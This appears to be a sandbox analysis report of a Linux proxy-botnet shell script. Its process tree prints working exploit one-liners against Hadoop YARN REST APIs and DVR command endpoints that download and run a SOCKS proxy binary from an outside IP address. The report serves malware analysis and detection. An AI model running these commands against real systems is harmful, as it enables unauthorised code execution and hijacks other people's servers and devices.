Analysis

  • max time kernel
    5s
  • max time network
    131s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20260513-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20260513-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    22/08/2026, 14:06

General

  • Target
    c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
  • Size 3KB
  • Sample260822-rertkavfjg
  • SHA256 c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
  • MD5 SHA1 SHA512 TLSH

Malware Config

Signatures

  • File and Directory Permissions Modification 1 TTPs 2 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Reads CPU attributes 1 TTPs 1 IoCs
  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • System Network Configuration Discovery 1 TTPs 6 IoCs

    Adversaries may gather information about the network configuration of a system.

  • Writes file to shm directory 9 IoCs

    Malware can drop malicious files in the shm directory which will run directly from RAM.

  • Writes file to tmp directory 2 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
    /tmp/c48b75abb560cd0a60a5c752e29730ae54e8454a024a60ca413fde9fe8a14508
    1⤵
    • Writes file to shm directory
    • Writes file to tmp directory
    PID:1540
    • /usr/bin/pgrep
      pgrep -f "masscan.*targeted"
      2⤵
      • Reads CPU attributes
      • Reads runtime system information
      PID:1541
    • /bin/date
      date "+%H:%M:%S"
      2⤵
        PID:1544
      • /bin/sleep
        sleep 5
        2⤵
          PID:1545
        • /usr/bin/awk
          awk "{print \$4\":\"\$3}"
          2⤵
            PID:1553
          • /bin/grep
            grep -v "^#" /dev/shm/.sys/raw.txt
            2⤵
              PID:1552
            • /bin/date
              date "+%H:%M:%S"
              2⤵
                PID:1555
              • /usr/bin/cut
                cut -d: -f1
                2⤵
                  PID:1559
                • /bin/grep
                  grep ":8088\$" /dev/shm/.sys/ips.txt
                  2⤵
                  • System Network Configuration Discovery
                  PID:1558
                • /usr/bin/cut
                  cut -d: -f1
                  2⤵
                    PID:1562
                  • /bin/grep
                    grep ":8080\$" /dev/shm/.sys/ips.txt
                    2⤵
                    • System Network Configuration Discovery
                    PID:1561
                  • /usr/bin/cut
                    cut -d: -f1
                    2⤵
                      PID:1565
                    • /bin/grep
                      grep ":80\$" /dev/shm/.sys/ips.txt
                      2⤵
                      • System Network Configuration Discovery
                      PID:1564
                    • /usr/bin/cut
                      cut -d: -f1
                      2⤵
                        PID:1568
                      • /bin/grep
                        grep ":23\$" /dev/shm/.sys/ips.txt
                        2⤵
                        • System Network Configuration Discovery
                        PID:1567
                      • /bin/date
                        date "+%H:%M:%S"
                        2⤵
                          PID:1581
                        • /usr/bin/xargs
                          xargs -P 500 "-I{}" sh -c "code=\$(curl -s -m 3 -o /dev/null -w \"%{http_code}\" -x http://{} http://httpbin.org/ip 2>/dev/null); [ \"\$code\" = \"200\" ] && echo {}"
                          2⤵
                          • System Network Configuration Discovery
                          PID:1583
                        • /bin/cat
                          cat /dev/shm/.sys/pproxy.txt
                          2⤵
                            PID:1582
                          • /usr/bin/xargs
                            xargs -P 500 "-I{}" sh -c "for p in 80 8080; do code=\$(curl -s -m 3 -o /dev/null -w \"%{http_code}\" -x http://{}:\$p http://httpbin.org/ip 2>/dev/null); [ \"\$code\" = \"200\" ] && echo \"{}:\$p\" && break; done"
                            2⤵
                            • System Network Configuration Discovery
                            PID:1587
                          • /usr/bin/sort
                            sort -u
                            2⤵
                              PID:1586
                            • /bin/cat
                              cat /dev/shm/.sys/p8080.txt /dev/shm/.sys/p80.txt
                              2⤵
                                PID:1585
                              • /usr/bin/sort
                                sort -u /dev/shm/.sys/verified_http.txt -o /dev/shm/.sys/verified_http.txt
                                2⤵
                                  PID:1589
                                • /bin/date
                                  date "+%H:%M:%S"
                                  2⤵
                                    PID:1592
                                  • /usr/bin/xargs
                                    xargs -P 100 "-I{}" sh -c " resp=\$(curl -s -m 5 \"http://{}:8088/ws/v1/cluster/info\" 2>/dev/null) echo \"\$resp\" | grep -q clusterInfo && { app=\$(curl -s -m 5 -X POST \"http://{}:8088/ws/v1/cluster/apps/new-application\" 2>/dev/null) appid=\$(echo \"\$app\" | python3 -c \"import json,sys;print(json.load(sys.stdin).get(\\\"application-id\\\",\\\"\\\"))\" 2>/dev/null) [ -n \"\$appid\" ] && { cmd=\"wget http://159.89.206.122:8888/microsocks -O /tmp/.ms;chmod +x /tmp/.ms;/tmp/.ms -p 1080 &\" curl -s -m 5 -X POST \"http://{}:8088/ws/v1/cluster/apps\" -H \"Content-Type: application/json\" -d \"{\\\"application-id\\\":\\\"\$appid\\\",\\\"application-name\\\":\\\"svc\\\",\\\"am-container-spec\\\":{\\\"commands\\\":{\\\"command\\\":\\\"\$cmd\\\"}},\\\"application-type\\\":\\\"YARN\\\"}\" 2>/dev/null sleep 5 check=\$(curl -s -m 5 -x socks5://{}:1080 http://httpbin.org/ip 2>/dev/null) echo \"\$check\" | grep -q origin && echo \"{}:1080\" >> /dev/shm/.sys/yarn_exploited.txt } } "
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:1594
                                  • /bin/cat
                                    cat /dev/shm/.sys/p8088.txt
                                    2⤵
                                      PID:1593
                                    • /bin/date
                                      date "+%H:%M:%S"
                                      2⤵
                                        PID:1597
                                      • /usr/bin/sort
                                        sort -u
                                        2⤵
                                          PID:1599
                                        • /bin/cat
                                          cat /dev/shm/.sys/p80.txt /dev/shm/.sys/p8080.txt
                                          2⤵
                                            PID:1598
                                          • /usr/bin/xargs
                                            xargs -P 200 "-I{}" sh -c " for path in /dvr/cmd /cn/cmd; do resp=\$(curl -s -m 3 \"http://{}\$path\" 2>/dev/null) if [ -n \"\$resp\" ]; then curl -s -m 3 -X POST \"http://{}\$path\" -d \"cmd=wget http://159.89.206.122:8888/microsocks -O /tmp/.ms;chmod +x /tmp/.ms;/tmp/.ms -p 1080 &\" 2>/dev/null sleep 3 check=\$(curl -s -m 5 -x socks5://{}:1080 http://httpbin.org/ip 2>/dev/null) echo \"\$check\" | grep -q origin && echo \"{}:1080\" && break fi done "
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:1600
                                          • /bin/date
                                            date "+%H:%M:%S"
                                            2⤵
                                              PID:1604
                                            • /usr/bin/sort
                                              sort -u
                                              2⤵
                                                PID:1606
                                              • /bin/cat
                                                cat /dev/shm/.sys/verified_http.txt /dev/shm/.sys/yarn_exploited.txt /dev/shm/.sys/dvr_exploited.txt /tmp/global.txt
                                                2⤵
                                                  PID:1605
                                                • /bin/mv
                                                  mv /tmp/global_new.txt /tmp/global.txt
                                                  2⤵
                                                    PID:1607
                                                  • /bin/sed
                                                    sed -i "s#^.*://##" /tmp/global.txt
                                                    2⤵
                                                    • Writes file to tmp directory
                                                    PID:1608
                                                  • /bin/date
                                                    date "+%H:%M:%S"
                                                    2⤵
                                                      PID:1609
                                                    • /usr/bin/wc
                                                      wc -l
                                                      2⤵
                                                        PID:1617
                                                      • /bin/date
                                                        date "+%H:%M:%S"
                                                        2⤵
                                                          PID:1618

                                                      Network

                                                            MITRE ATT&CK Enterprise v16

                                                            Replay Monitor

                                                            Loading Replay Monitor...

                                                            Downloads